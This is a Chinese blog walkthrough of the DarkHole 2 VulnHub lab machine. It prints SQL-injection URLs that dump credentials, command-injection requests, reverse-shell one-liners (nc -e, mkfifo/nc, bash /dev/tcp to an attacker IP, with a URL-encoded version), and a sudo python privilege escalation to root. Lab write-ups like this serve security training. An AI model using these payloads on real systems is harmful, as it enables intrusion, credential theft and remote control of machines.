声明
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
靶机地址:
https://download.vulnhub.com/darkhole/darkhole_2.zip
内容简介:
主机发现
端口扫描
信息收集
Git 库泄漏
源码分析
SQL注入
端口转发
信息收集
密码爆破
水平提权
Root提权
1.1 主机发现
arp-scan -l
1.2 端口扫描
nmap -p- 192.168.112.136
1.3 信息搜集
nmap -p22,80 -A 192.168.112.136
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-31 22:21 EDT
Nmap scan report for 192.168.112.136
Host is up (0.00071s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 57:b1:f5:64:28:98:91:51:6d:70:76:6e:a5:52:43:5d (RSA)
| 256 cc:64:fd:7c:d8:5e:48:8a:28:98:91:b9:e4:1e:6d:a8 (ECDSA)
|_ 256 9e:77:08:a4:52:9f:33:8d:96:19:ba:75:71:27:bd:60 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-git:
| 192.168.112.136:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: i changed login.php file for more secure
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: DarkHole V2
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 00:0C:29:FF:A4:81 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.71 ms 192.168.112.136
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds
查看到了git版本
http://192.168.112.136/.git/
1.4 Git库泄露
下载git库
wget -r http://192.168.112.136/.git
cd 192.168.112.136/
git log // 查看更新日志
git clone . backup //还原源代码
git checkout a4d900a8d85e8938d3601f3cef113ee293028e10 //还原到第二次更新
cat login.php
分析出在第二次更新的时候存在默认的身份认证
源代码还原到第二次的时候
a4d900a8d85e8938d3601f3cef113ee293028e10
存在默认的账号密码
账户 lush@admin.com 密码 321
登录页面
http://192.168.112.136/login.php
登陆成功!
1.5 SQL注入
发现id=1存在sql注入字符型报错
http://192.168.112.136/dashboard.php?id=1
http://192.168.112.136/dashboard.php?id=1%27+order+by+6--+ //查看字段数为 6
http://192.168.112.136/dashboard.php?id=2%27+union%20select+1,2,3,4,5,6--+ //查询字段位置
http://192.168.112.136/dashboard.php?id=2%27+union%20select+1,database(),3,4,5,6--+ //查数据库名称
darkhole_2
http://192.168.112.136/dashboard.php?id=2%27+union%20select+1,table_name,3,4,5,6%20from%20information_schema.tables%20where%20table_schema=%22darkhole_2%22--+ //查询表名称
ssh
查询字段
http://192.168.112.136/dashboard.php?id=2%27+union%20select+1,GROUP_CONCAT(column_name),3,4,5,6%20from%20information_schema.columns%20where%20table_name=%22ssh%22--+
id pass user
爆破字段
http://192.168.112.136/dashboard.php?id=2%27+union%20select+1,id,user,4,pass,6%20from%20ssh%20--+
账户 jehad
密码 fool
ssh登陆
ssh jehad@192.168.112.136 //密码 fool
登陆成功
1.6 端口转发+信息收集
cat /etc/passwd
// 查看用户信息
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lama:x:1000:1000:darkhole:/home/lama:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
mysql:x:113:117:MySQL Server,,,:/nonexistent:/bin/false
jehad:x:1001:1001:,,,:/home/jehad:/bin/bash
losy:x:1002:1002:,,,:/home/losy:/bin/bash
发现存在三个账户
losy jehad lama
cd /home
cd jehad/
cat .bash_history
发现存在本地端口转发
ssh -L 127.0.0.1:90:192.168.135.129:9999 jehad@192.168.135.129
curl "http://localhost:9999/?cmd=id"
cat /etc/crontab
exit
curl "http://localhost:9999/?cmd=wget http://google.com"
curl "http://localhost:9999/?cmd=wget&http://google.com"
curl "http://localhost:9999/?cmd=wget%20http://google.com"
curl "http://localhost:9999/?cmd=chmod%20+s%20/bin/bash"
ls -la /usr/bin/bash
curl "http://localhost:9999/?cmd=cat%20/etc/passwd"
curl "http://localhost:9999/?cmd=nc%20-e%20/bin/sh%20192.168.135.128%204242"
curl "http://localhost:9999/?cmd=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202>&1|nc%20192.168.135.128%204242%20>/tmp/f"
clear
curl "http://127.0.0.1:9999/?cmd=ls -la"
curl "http://127.0.0.1:9999/?cmd=ls%20-la"
curl "http://127.0.0.1:9999/?cmd=cd%20~&ls"
curl "http://127.0.0.1:9999/?cmd=cd%20~&&ls"
curl "http://127.0.0.1:9999/?cmd=cd%20~||ls"
curl "http://127.0.0.1:9999/?cmd=cd%20/home/losy%20&&%20ls"
似乎是让别人攻击进入了
ss -pantu | grep 9999
ps -ef | grep 9999
cd /opt/web
cat index.php
//127.0.0.1:9999/?cmd=id :
得到losy权限
1.7 水平提权
利用
https://gchq.github.io/CyberChef/
进行url编码
bash -c "bash -i >& /dev/tcp/192.168.112.128/4242 0>&1"
把反弹代码经过url编码得到payload
bash -c "bash -i >& /dev/tcp/192.168.112.128/4242 0>&1" |
bash%20%2Dc%20%22bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F192%2E168%2E112%2E128%2F4242%200%3E%261%22 |
执行此代码成功反弹shell,得到losy用户权限
curl http://127.0.0.1:9999/?cmd=bash%20%2Dc%20%22bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F192%2E168%2E112%2E128%2F4242%200%3E%261%22
1.8 root提权
cat .bash_history
python3 -c 'import pty;pty.spawn("/bin/bash")' //升级终端
sudo -l // 密码 gang
sudo python3 -c 'import pty;pty.spawn("/bin/bash")' //获得 root权限
发现密码password:gang
注:如有侵权请后台联系进行删除
觉得内容不错,请点一下"赞"和"在看"
原文始发于微信公众号(嗨嗨安全):靶机实战系列之darkhole_2靶机
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论